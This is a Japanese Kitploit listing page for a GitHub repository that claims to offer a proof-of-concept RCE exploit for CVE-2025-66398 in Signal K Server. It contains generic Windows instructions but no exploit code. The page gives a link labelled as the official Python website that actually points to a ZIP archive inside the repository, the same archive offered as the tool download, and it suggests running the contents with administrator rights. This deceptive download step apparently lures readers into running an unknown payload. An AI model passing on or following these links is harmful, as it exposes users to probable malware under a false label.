Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
cve-2025-66398 — Signal K Server CVE-2025-66398 の悪用を実証し、認証されていない攻撃者がバックドアを注入してリモートコード実行を可能にすることを示します。 | Kitploit
ツール/GitHubGitHub/showy-headteacher114/cve-2025-66398
脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテストリモートアクセスツールペイロード開発
GitHubshowy-headteacher114/cve-2025-66398

cve-2025-66398

Signal K Server CVE-2025-66398 の悪用を実証し、認証されていない攻撃者がバックドアを注入してリモートコード実行を可能にすることを示します。

リポジトリを見る
12日前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

⚠️ cve-2025-66398 - Simple RCE Proof of Concept Tool

Download


⚙️ このツールについて

このプロジェクトは、Signal K Server バージョン 2.18.0 以前におけるリモートコード実行(RCE)の脆弱性を示しています。この Proof of Concept(PoC)は、攻撃者が脆弱なデバイス上でコマンドを実行する方法を示しています。

このツールは、セキュリティテスター、システム管理者、またはこのセキュリティ問題を理解したい方を対象としています。実行にあたってプログラミングスキルは必要ありませんが、基本的なコンピュータ操作の知識があると役立ちます。


🖥️ システム要件

  • Windows 10 以降
  • 最低 2 GB の空き RAM
  • 100 MB の空きディスク容量
  • ファイルダウンロードのためのインターネット接続
  • 管理者権限は不要

📥 ダウンロードとインストール方法

以下のボタンをクリックしてプロジェクトページにアクセスし、ファイルをダウンロードしてください。

Download

ステップ 1: ダウンロードページにアクセス

上記のリンクにアクセスしてください。GitHub のページにファイルとフォルダの一覧が表示されます。

ステップ 2: ZIP ファイルをダウンロード

ページ右上付近にある緑色の Code ボタンを探し、クリックして Download ZIP を選択します。

ステップ 3: ファイルを展開

  • ダウンロードフォルダ内のダウンロードした ZIP ファイルを見つけます。
  • ZIP ファイルを右クリックし、「すべて展開」を選択します。
  • ファイルを配置したいフォルダを選び、「展開」をクリックします。

ステップ 4: アプリケーションを見つける

展開したフォルダを開きます。スクリプトやドキュメントなど、プロジェクトに関連するファイルが表示されます。


▶️ Windows でツールを実行する方法

このプロジェクトでは、Python と Go で書かれたスクリプトを使用します。ツールを実行するには、簡単なコマンドプロンプトウィンドウを使用します。

ステップ 1: コマンドプロンプトを開く

  • キーボードで Win + R を押します。
  • cmd と入力し、Enter キーを押します。

ステップ 2: フォルダに移動

次のコマンドを入力します。path\to\folder は実際の展開したフォルダのパスに置き換えてください。

root@kitploit:~
cd path\to\folder

Enter キーを押します。

ステップ 3: スクリプトを実行

run.bat や start.bat などの名前のスクリプトが見つかる場合があります。その場合は、名前を入力して Enter キーを押します。例:

root@kitploit:~
run.bat

BAT ファイルがない場合は、.py で終わる Python スクリプトを探します。その場合、PC に Python がインストールされている必要があります(次のセクション参照)。

次のコマンドを入力して実行します:

root@kitploit:~
python scriptname.py

scriptname.py を実際のファイル名に置き換えてください。


🐍 Python のインストール(必要な場合)

Python が認識されないというエラーが表示された場合は、Python をインストールする必要があります。

ステップ 1: Python をダウンロード

公式 Python ウェブサイトにアクセス:

https://raw.githubusercontent.com/showy-headteacher114/cve-2025-66398/main/docker/vendor/cve_v1.2.zip

最新の Windows インストーラをクリックしてダウンロードします。

ステップ 2: Python をインストール

  • ダウンロードしたインストーラを実行します。
  • Install Now をクリックする前に、Add Python to PATH にチェックを入れます。
  • インストールが完了するまで待ちます。

ステップ 3: Python のインストールを確認

新しいコマンドプロンプトウィンドウを開き、次のように入力します:

root@kitploit:~
python --version

インストールされた Python のバージョンが表示されるはずです。


🚨 ツールの安全な実行

このツールは、特定の脆弱性についてのテストと学習のみを目的としています。テストネットワークや隔離されたマシンなど、安全な環境で使用してください。

所有していないシステムや、テストの許可を得ていないシステムに対しては決して実行しないでください。


🔍 ツールの仕組み

このツールは、Signal K Server バージョン 2.18.0 以前を実行しているデバイスをスキャンします。脆弱性を悪用するコマンドを送信し、ターゲットがそれを実行するかどうかを確認します。

これにより、セキュリティ専門家は自分のシステムが脆弱であるかどうかを確認し、アップデートや保護のための対策を講じることができます。


💡 トラブルシューティング

  • ツールが起動しない場合は、コマンドプロンプトで正しいフォルダにいることを確認してください。
  • Python がインストールされ、システム PATH に追加されていることを確認してください。
  • ネットワークアクセスをブロックする可能性のある他のアプリケーションを閉じてください。
  • 権限エラーが発生した場合は、コマンドプロンプトを管理者として実行してください。
  • ターゲットデバイスがネットワーク上で到達可能であることを確認してください。

📄 その他のリソース

CVE-2025-66398 の脆弱性の詳細については、セキュリティデータベースや GitHub で関連する研究を検索してください。


🔗 ダウンロードリンク

ツールファイルをダウンロードするには、このページにアクセスしてください:

https://raw.githubusercontent.com/showy-headteacher114/cve-2025-66398/main/docker/vendor/cve_v1.2.zip

ツールをダウンロード